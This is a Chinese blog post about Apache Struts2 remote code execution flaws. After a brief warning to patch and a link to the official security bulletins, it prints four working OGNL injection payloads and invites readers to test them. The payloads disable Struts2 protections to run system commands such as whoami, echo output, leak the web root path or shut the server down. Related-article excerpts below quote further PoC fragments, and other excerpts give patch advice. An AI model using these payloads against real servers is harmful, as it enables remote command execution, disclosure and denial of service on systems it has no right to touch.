高危 struts2 远程执行代码漏洞

最新推荐文章于 2019-10-09 10:04:33 发布
最新推荐文章于 2019-10-09 10:04:33 发布
阅读量339 收藏
点赞数
分类专栏: struts2 远程执行漏洞 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wu_xian_jun/article/details/84450341
版权
用struts2 的童鞋主意了,最近出了几个比较严重的安全漏洞,危害及大。没补丁的童鞋赶快补丁,服务器会被别人日了。
下面公布几个exp 有兴趣的童鞋可以去测试下,不懂的可以联系俺,共同探讨下。说不定还能发现0day.

15个漏洞及补丁自己去官网看:
https://cwiki.apache.org/confluence/display/WW/Security+Bulletins

exp1: 

?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1



exp 2: 

?class.classLoader.jarPath=(%23context%5b"xwork.MethodAccessor.denyMethodExecution"%5d%3d+new+java.lang.Boolean(false)%2c+%23_memberAccess%5b"allowStaticMethodAccess"%5d%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime().exec(%27whoami%27).getInputStream()%2c%23b%3dnew+java.io.InputStreamReader(%23a)%2c%23c%3dnew+java.io.BufferedReader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23s3cur1ty%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23s3cur1ty.println(%23d)%2c%23s3cur1ty.close())(aa)&x[(class.classLoader.jarPath)('aa')]


exp3: 

1${(%23_memberAccess["allowStaticMethodAccess"]=true,%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23k8out=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23k8out.println(%23req.getRealPath("/")),%23k8out.close())}


exp4: 

${%23context%5b"xwork.MethodAccessor.denyMethodExecution"%5d%3d new java.lang.Boolean(false)%2c %23_memberAccess%5b"allowStaticMethodAccess"%5d%3dtrue%2c %23a%3d%40java.lang.Runtime%40getRuntime().exec(%27whoami%27).getInputStream()%2c%23b%3dnew java.io.InputStreamReader(%23a)%2c%23c%3dnew java.io.BufferedReader(%23b)%2c%23d%3dnew char%5b50000%5d%2c%23c.read(%23d)%2c%23s3cur1ty%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23s3cur1ty.println(%23d)%2c%23s3cur1ty.close()}
wu_xian_jun
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
0x26.Apache Struts2远程代码执行漏洞(S2-019)复现
qq_31679787的博客
10-21 885
s2-019:动态方法调用是一种已知会施加可能的安全漏洞的机制,但到目前为止,它默认启用,警告用户应尽可能将其关闭; 构造poc: ?debug=command&expression=#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set...
Struts 2 远程代码执行漏洞(s2-045\s2-046)修复所用到的包
03-23
1.严格过滤 Content-Type 、filename里的内容,严禁ognl表达式相关字段。 2.如果您使用基于Jakarta插件,请升级到Apache Struts 2.3.32或2.5.10.1版本。(强烈推荐) 3.升级到2.3.32所用到的jar包: freemarker-2.3.22.jar ognl-3.0.19.jar struts2-convention-plugin-2.3.32.jar struts2-core-2.3.32.jar struts2-spring-plugin-2.3.32.jar xwork-core-2.3.32.jar --来源 http://mvnrepository.com/artifact/org.apache.struts/struts2-spring-plugin/2.3.32
Struts2安全漏洞
solobear的专栏
07-27 3815
摘要:Struts应用开发框架目前广泛应用于大型互联网企业、政府、金融机构等网站建设,并作为网站开发的底层模板使用。近日网上公布了Struts一个严重的命令执行漏洞,在我国互联网环境影响巨大,本文将对这个漏洞进行分析和描述。 Struts是Apache软件基金会Jakarta项目组的一个开源项目,它采用MVC模式,帮助java开发者利用J2EE开发Web应用。目前,Struts广泛应用于大型
鬼哥struts2测试工具.exe
01-03
鬼哥struts2测试工具.exe
struts2远程命令执行漏洞S2-045
weixin_33755557的博客
03-07 603
Apache Struts2最新漏洞(CVE-2017-5638,S02-45) struts2远程命令执行漏洞S2-045 Apache Struts 2被曝存在远程命令执行漏洞漏洞编号S2-045,CVE编号CVE-2017-5638,在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵,漏洞评级为:高危漏洞详情:恶意用户可在上传文件时通过修...
struts-2.3.24-apps.zip包测试Struts2 S2-048高危漏洞
09-08
2017年7月7日,Apache Struts发布最新的安全公告,Apache Struts2-strus1-plugin插件存在远程代码执行高危漏洞漏洞编号为CVE-2017-9791(S2-048),主要受影响的Struts版本为:2.3.x。 攻击者可以构造恶意的字段值...
struts2漏洞列表
12-02
然而,Struts2在历史上存在一系列的安全漏洞,这些漏洞可能导致严重的安全风险,如远程代码执行、信息泄露等。以下是对几个重要漏洞的详细解释: 1. **S2-001 - OGNL注入漏洞** 这个漏洞主要由于Struts2的`...
jboss与struts漏洞解决
08-13
具体来说,Apache Struts2的action:、redirect:和redirectAction:前缀允许攻击者构造恶意URL,执行任意Java代码,甚至执行系统命令,这被CNVD评定为“高危”级别。为解决这一问题,最直接的办法是更新Struts2的jar包...
s2-045漏洞补丁struts-2.3.32最新免费版
07-29
近日安全研究院WEBIN实验室高级安全研究员发现著名J2EE框架——Struts2存在远程代码执行的严重漏洞。目前Struts2官方已经确认漏洞(漏洞编号S2-045,CVE编号:cve-2017-5638),并定级为高危风险。 这里提供了s2-045...
struts-2.3.32
03-08
漏洞类型:远程代码执行 漏洞级别:高危 漏洞风险:黑客通过利用漏洞可以实现远程命令执行。 影响版本:struts2.3.5– struts2.3.31 , struts2.5–struts2.5.10。 本篇文章来源于:...
struts2测试工具
09-26
具体做什么用的,忘记了,各位随意下载~~~~~~~~~~~~~~~~~~~~~不知道什么鬼策略,莫名把下载积分提了这么高.~~~
Struts2远程代码执行漏洞
杨博程的专栏
03-18 3404
Struts2曝远程代码执行漏洞 本文摘自:http://www.oschina.net/news/74386/struts-2-cve-2016-4438 今年4月份,Apache Struts 2之上发现的S2-033远程代码执行漏洞,以迅雷不及掩耳之势席卷而来。其利用代码很快就在短时间内迅速传播。而且官方针对这个高危漏洞的修复方案还是无效的。
Struts 2 远程代码执行漏洞加固方法
zephyr的专栏
09-04 909
加固方式如下:     通过判断Content-Type头是否为白名单类型,来限制非法Content-Type的攻击。 加固代码: import java.io.IOException; import javax.servlet.Filter; import javax.servlet.FilterChain; import javax.servlet.FilterConfig; impor
Struts2高危远程代码执行(S2-037)漏洞及修复方案
10-09 622
漏洞描述: Struts 2再曝远程代码执行漏洞S2-037,CVE编号CVE-2016-4438。使用REST插件的用户会受到影响。 影响版本: Struts 2.3.20-2.3.28.1 漏洞等级: 高危 修复建议: 1、升级到2.3.29版本。 2、使用百度云加速WAF防火墙进行防御。 3、添加网站至云观测,及时了解网站组件突发/0day漏洞。 ...
Struts2漏洞利用工具下载(更新2017-V1.8版增加S2-045/S2-046)
weixin_34174105的博客
04-12 1358
Struts2漏洞利用工具下载(已更新V1.8版) 2017-03-21:增加S2-046,官方发布S2-046和S2-045漏洞引发原因一样,只是利用漏洞的位置发生了变化,S2-046方式可能绕过部分WAF防护,存在S2-045就存在S2-046。http://struts.apache.org/docs/s2-046.html、 2017-03-07: 增加安恒信息研究...
【S2-045】 Struts2远程命令执行漏洞(CVE-2017-5638)
热门推荐
Jaychouzzk
11-05 2万+
实验环境 操作机:Windows XP 目标机:Centos 6.5 Struts版本:2.3.31 请访问http://file.ichunqiu.com/74tk6wy6下载实验文件 实验目的: 了解S2-045 Struts2远程命令执行漏洞危害 掌握检测修复S2-045 Struts2远程命令执行漏洞技术 实验文件: ...
Apache Struts2远程代码执行漏洞(S2-001)复现
qq_36933272的博客
09-01 822
根据参考链接,密码框输入%(1+1)验证是否存在S-2001漏洞,用户名任意 回显2,存在漏洞,网上寻找poc,ls查看根目录下的文件,发现key.txt%{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{“ls”,"/"})).redirectErrorStream(true).start(), #b=#a.getInputStr...
Struts2远程命令执行漏洞
mirror97black的博客
12-20 1万+
Struts2 远程命令执行漏洞
struts2之漏洞检查工具2019版
最新发布
07-04
### 回答1: struts2是一款流行的Java Web应用程序框架,但由于其复杂性和广泛应用,容易存在安全漏洞。为了确保应用程序的安全性,我们需要使用漏洞检查工具来及时发现和修复漏洞。 2019版的struts2漏洞检查工具通常包括以下功能: 1. 漏洞扫描:该工具可以对struts2应用程序进行全面的漏洞扫描,包括已知漏洞、常见安全配置错误等,确保没有已知的安全漏洞存在。 2. 安全配置评估:该工具可以评估当前应用程序的安全配置情况,包括是否启用了安全性强化功能、是否配置了正确的权限控制等,以确保应用程序配置的安全性。 3. 漏洞修复建议:该工具可以给出针对已发现的漏洞的修复建议,包括修改配置文件、更新框架版本等,以帮助开发人员及时解决安全问题。 4. 实时监控:一些工具提供实时监控功能,能够对运行中的应用程序进行实时检测,及时响应可能的攻击行为。 5. 安全漏洞库更新:漏洞检查工具通常会定期更新安全漏洞库,以跟踪新发现的漏洞和修复方法,确保检查结果的准确性和及时性。 这些工具可以帮助开发人员在应用程序开发和部署过程中识别潜在的安全风险,并提供相应的修复建议。然而,需要注意的是,漏洞检查工具只是安全工作的一部分,还需要结合其他安全措施,如代码审查、安全培训等,来确保应用程序的整体安全性。 ### 回答2: struts2是一款常用的Java Web应用程序开发框架,但由于其一些设计缺陷和安全漏洞,可能导致潜在的安全威胁。因此,研发团队和安全从业人员都需要一个有效的漏洞检查工具来评估和发现可能存在的漏洞。 在2019年,有一些流行的漏洞检查工具可以用于检测struts2框架中的安全漏洞。这些工具通过自动化扫描和分析应用程序的源代码或运行时环境来发现潜在的漏洞。 其中一款被广泛使用的工具是S2-057漏洞检查工具。S2-057是一种struts2框架中的远程代码执行漏洞,可以被攻击者利用来执行任意命令。这款工具通过检查应用程序的配置文件和代码,以及运行时环境的一些指示符,来判断是否存在该漏洞。 另外,还有一些综合性的漏洞检查工具,如SonarQube和OWASP Dependency-Check,也可以用于检查struts2框架的安全漏洞。这些工具不仅可以检测struts2特定的漏洞,还可以扫描应用程序的依赖组件,以发现可能存在的漏洞和安全问题。 综上所述,struts2框架的漏洞检查工具在2019年有多种可选择的选项。无论是针对特定的漏洞还是综合性的安全扫描,开发者和安全从业人员都可以根据自己的需求选择合适的工具来提高应用程序的安全性。当然,定期更新和修复漏洞也是保障应用程序安全的重要措施。 ### 回答3: Struts2是一个非常受欢迎的Java Web应用程序开发框架,但它曾经有过一些安全漏洞,这些漏洞可能导致恶意用户利用该框架执行潜在的远程命令执行、信息泄露或拒绝服务攻击。因此,为了保障应用程序的安全性,需要使用一个强大的漏洞检查工具来发现和修复这些潜在的安全漏洞。 在2019年,我们推荐使用S2-057漏洞检查工具来检测Struts2应用程序中的漏洞。S2-057是Struts2框架的一个高危漏洞,被称为"远程代码执行"漏洞,可使攻击者通过特制的HTTP请求在服务器上执行任意代码。检查工具能够扫描Web应用程序的源代码,查找可能受漏洞影响的部分,并向开发人员提供修复建议。 使用S2-057漏洞检查工具的步骤如下: 1. 下载并安装漏洞检查工具,确保其与您的开发环境兼容。 2. 打开检查工具并导入Struts2 Web应用程序的源代码。 3. 在检查工具界面上,选择运行漏洞检查或扫描。 4. 工具将扫描源代码,查找可能受S2-057漏洞影响的部分。 5. 检查工具将生成报告,列出已发现的漏洞和修复建议。 6. 根据报告中的指导,修复应用程序中的漏洞。 请注意,虽然漏洞检查工具可以帮助发现Struts2应用程序中的潜在安全问题,但并不能保证所有漏洞都能被检测到或修复。因此,我们还建议您保持对Struts2以及其他相关框架的安全更新,并遵循最佳实践来确保应用程序的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值